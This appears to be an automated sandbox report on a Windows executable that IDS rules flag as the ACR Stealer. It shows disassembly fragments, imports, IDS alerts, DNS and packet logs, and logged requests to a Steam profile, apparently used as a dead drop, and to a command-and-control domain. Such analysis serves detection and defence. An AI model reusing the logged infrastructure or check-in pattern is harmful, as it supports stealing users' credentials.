                                                                                                                                                                                              nop
                                                                                                                                                                                              lea ebx, dword ptr [ebp-24h]
                                                                                                                                                                                              mov dword ptr [ebx], eax
                                                                                                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                              or eax, dword ptr [ebp-08h]
                                                                                                                                                                                              or eax, edi
                                                                                                                                                                                              mov dword ptr [ebx+04h], esi
                                                                                                                                                                                              mov dword ptr [ebx+08h], ecx

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x57f400x8c.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000x37bc.reloc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x513d00x38.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x513100x40.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x460000x1a4.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x10000x44a0a0x44c008d7060d73bc148599fa8d6329daec2edFalse0.5540056818181818data6.635307481318297IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rdata0x460000x128da0x12a00514b84d1c41bc5ae9a4f2bd0b693bec4False0.4049522860738255data4.9965728381036545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .data0x590000x22480x140071b16004b0d569191cb890591629e3c2False0.1845703125DOS executable (block device driver)3.3917146849602275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .reloc0x5c0000x37bc0x38003f1d3462bb72b406a84416993d5de400False0.7054268973214286data6.597143871177635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              KERNEL32.dllMultiByteToWideChar, FindFirstFileA, HeapFree, OutputDebugStringA, FindNextFileA, lstrlenA, FindClose, Sleep, GetTempPathA, HeapAlloc, GetProcessHeap, GetNativeSystemInfo, WriteFile, SetFilePointer, CreateFileA, CloseHandle, ExitProcess, TerminateProcess, WaitForSingleObject, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, GetCurrentProcessId, WideCharToMultiByte, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, ReadConsoleW, GetFileSizeEx, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, SetEndOfFile, CreateFileW, GetFileType, ReadFile, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, SetStdHandle, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, WriteConsoleW
                                                                                                                                                                                              USER32.dllFindWindowA
                                                                                                                                                                                              SHELL32.dllSHGetFolderPathA
                                                                                                                                                                                              WININET.dllInternetWriteFile
                                                                                                                                                                                              SHLWAPI.dllPathMatchSpecA
                                                                                                                                                                                              RstrtMgr.DLLRmGetList, RmRegisterResources, RmStartSession, RmEndSession

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2025-01-01T09:06:58.180719+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449730104.102.49.254443TCP
                                                                                                                                                                                              2025-01-01T09:06:59.267860+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449731188.114.97.3443TCP
                                                                                                                                                                                              2025-01-01T09:06:59.267860+01002052674ET MALWARE ACR Stealer CnC Checkin Attempt1192.168.2.449731188.114.97.3443TCP

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 1, 2025 09:06:56.998997927 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:56.999038935 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:56.999244928 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.017313957 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.017324924 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:57.666670084 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:57.666785955 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.728427887 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.728436947 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:57.728692055 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:57.728775978 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.732364893 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:57.779320002 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180728912 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180746078 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180758953 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180788040 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180794001 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180833101 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.180860996 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275837898 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275856972 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275908947 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275914907 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275928020 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.275962114 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.280996084 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.281055927 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285590887 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285636902 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285645008 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285697937 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285969973 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                              Jan 1, 2025 09:06:58.285979033 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.392661095 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:58.392715931 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.392791986 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:58.393271923 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:58.393289089 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.946261883 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.946322918 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.034507990 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.034538031 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:59.034729958 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:59.034790993 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.076704979 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.123327017 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:59.267857075 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:59.267899990 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:59.267911911 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.267946005 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.431689024 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                                                              Jan 1, 2025 09:06:59.431735039 CET44349731188.114.97.3192.168.2.4

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 1, 2025 09:06:56.983930111 CET5688453192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 1, 2025 09:06:56.990803003 CET53568841.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 1, 2025 09:06:58.359020948 CET6338053192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 1, 2025 09:06:58.381963015 CET53633801.1.1.1192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 1, 2025 09:06:56.983930111 CET192.168.2.41.1.1.10xb57Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 1, 2025 09:06:58.359020948 CET192.168.2.41.1.1.10x8960Standard query (0)llal.xyzA (IP address)IN (0x0001)false

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 1, 2025 09:06:56.990803003 CET1.1.1.1192.168.2.40xb57No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 1, 2025 09:06:58.381963015 CET1.1.1.1192.168.2.40x8960No error (0)llal.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 1, 2025 09:06:58.381963015 CET1.1.1.1192.168.2.40x8960No error (0)llal.xyz188.114.96.3A (IP address)IN (0x0001)false

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                              • llal.xyz

                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449730104.102.49.2544437504C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-01 08:06:57 UTC206OUTGET /profiles/76561199619938930 HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              2025-01-01 08:06:58 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Date: Wed, 01 Jan 2025 08:06:58 GMT
                                                                                                                                                                                              Content-Length: 35137
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: sessionid=9e2c37b57a41d76591d59548; Path=/; Secure; SameSite=None
                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                              2025-01-01 08:06:58 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                              2025-01-01 08:06:58 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                                                                                                                              Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                              2025-01-01 08:06:58 UTC3768INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75
                                                                                                                                                                                              Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actu
                                                                                                                                                                                              2025-01-01 08:06:58 UTC506INData Raw: 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09
                                                                                                                                                                                              Data Ascii: >Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449731188.114.97.34437504C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-01 08:06:59 UTC210OUTGET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                              Host: llal.xyz
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              2025-01-01 08:06:59 UTC951INHTTP/1.1 521
                                                                                                                                                                                              Date: Wed, 01 Jan 2025 08:06:59 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                              Content-Length: 15
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfhATMRDtVM3VPsEddEfg750%2FX7jukGcMbWpuSdbNXFC%2B2Lu8g%2BA1EJvFe%2BjG5krIlWbbK8mwF4YB7kA%2BWcs57WQnB5ckvN4iT0tv8rM8fYbrSDtePPLTdI5Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fb1035b9a7741de-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=52860&min_rtt=1809&rtt_var=30960&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=848&delivery_rate=1614151&cwnd=225&unsent_bytes=0&cid=b9ea8cea6d35744e&ts=327&x=0"
                                                                                                                                                                                              2025-01-01 08:06:59 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                                                                                                                                                                              Data Ascii: error code: 521


                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:03:06:55
                                                                                                                                                                                              Start date:01/01/2025
                                                                                                                                                                                              Path:C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\OXoeX1Ii3x.exe"
                                                                                                                                                                                              Imagebase:0x140000
                                                                                                                                                                                              File size:378'368 bytes
                                                                                                                                                                                              MD5 hash:3E9881B9C6FF4994FC9D684456694E77
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                              Start time:03:06:58
                                                                                                                                                                                              Start date:01/01/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
                                                                                                                                                                                              Imagebase:0x890000
                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:2.4%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:4.7%
                                                                                                                                                                                                Total number of Nodes:728
                                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                                execution_graph 33075 14ac27 33076 14ac2f 33075->33076 33077 14ac3c 33075->33077 33079 14be69 33076->33079 33080 14beae _AnonymousOriginator 33079->33080 33081 14bea1 33079->33081 33086 15ca60 33080->33086 33085 145c91 39 API calls 2 library calls 33081->33085 33084 14bed4 33084->33077 33085->33080 33087 15ca69 IsProcessorFeaturePresent 33086->33087 33088 15ca68 33086->33088 33090 15caab 33087->33090 33088->33084 33093 15ca6e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33090->33093 33092 15cb8e 33092->33084 33093->33092 33094 14f791 33117 14a85f 33094->33117 33098 14f7b6 33154 14efdd 33098->33154 33108 14f814 33109 14ac78 std::ios_base::_Init 39 API calls 33108->33109 33110 14f9c2 33109->33110 33111 14ac78 std::ios_base::_Init 39 API calls 33110->33111 33112 14f9ce 33111->33112 33113 14f9e8 33112->33113 33114 14be69 std::ios_base::_Init 39 API calls 33112->33114 33200 17fc49 33113->33200 33114->33113 33118 14a87c 33117->33118 33118->33118 33203 14bb7d 33118->33203 33120 14a890 33121 14cba6 33120->33121 33122 14cbb2 __EH_prolog3 33121->33122 33123 14a85f std::ios_base::_Init 41 API calls 33122->33123 33124 14cbcb 33123->33124 33125 14cc0a 33124->33125 33268 14df81 41 API calls 2 library calls 33124->33268 33264 14ad83 33125->33264 33128 14cbee 33269 14a805 33128->33269 33129 14cc18 33131 14cc20 33129->33131 33132 14cc6d 33129->33132 33134 14cce6 46 API calls 33131->33134 33274 14fc37 41 API calls 2 library calls 33132->33274 33136 14cc30 33134->33136 33135 14ac78 std::ios_base::_Init 39 API calls 33135->33125 33273 14fba6 41 API calls 2 library calls 33136->33273 33139 14cc86 33141 14a805 41 API calls 33139->33141 33140 14cc50 33142 14a805 41 API calls 33140->33142 33144 14cc6b 33141->33144 33143 14cc5f 33142->33143 33145 14ac78 std::ios_base::_Init 39 API calls 33143->33145 33146 14ac78 std::ios_base::_Init 39 API calls 33144->33146 33145->33144 33148 14cca1 33146->33148 33147 14ccdc std::ios_base::_Init 33147->33098 33148->33147 33275 14fc37 41 API calls 2 library calls 33148->33275 33150 14ccc1 33151 14a805 41 API calls 33150->33151 33152 14ccd1 33151->33152 33153 14ac78 std::ios_base::_Init 39 API calls 33152->33153 33153->33147 33155 14efec __EH_prolog3_GS 33154->33155 33277 145f07 33155->33277 33157 14f00f 33281 145fb9 33157->33281 33159 14f025 33160 14a85f std::ios_base::_Init 41 API calls 33159->33160 33161 14f038 33160->33161 33301 145eb3 33161->33301 33163 14f049 33309 14e38d 33163->33309 33165 14f05d 33166 14ac78 std::ios_base::_Init 39 API calls 33165->33166 33167 14f06c 33166->33167 33168 14ac78 std::ios_base::_Init 39 API calls 33167->33168 33169 14f078 33168->33169 33170 14ac78 std::ios_base::_Init 39 API calls 33169->33170 33171 14f087 33170->33171 33172 14ac78 std::ios_base::_Init 39 API calls 33171->33172 33173 14f096 33172->33173 33325 145e6c 33173->33325 33175 14f0b3 33176 14ac78 std::ios_base::_Init 39 API calls 33175->33176 33177 14f0d7 33176->33177 33178 17fc49 5 API calls 33177->33178 33179 14f0de 33178->33179 33180 14cce6 33179->33180 33186 14ccf2 __EH_prolog3_GS 33180->33186 33181 14cd71 33182 17fc49 5 API calls 33181->33182 33184 14cd78 33182->33184 33183 14ac9e 41 API calls 33183->33186 33188 14fa63 33184->33188 33186->33181 33186->33183 33187 14a7e4 41 API calls 33186->33187 33404 1458a1 44 API calls 33186->33404 33187->33186 33189 14f7f7 33188->33189 33190 14fa79 33188->33190 33195 14ac78 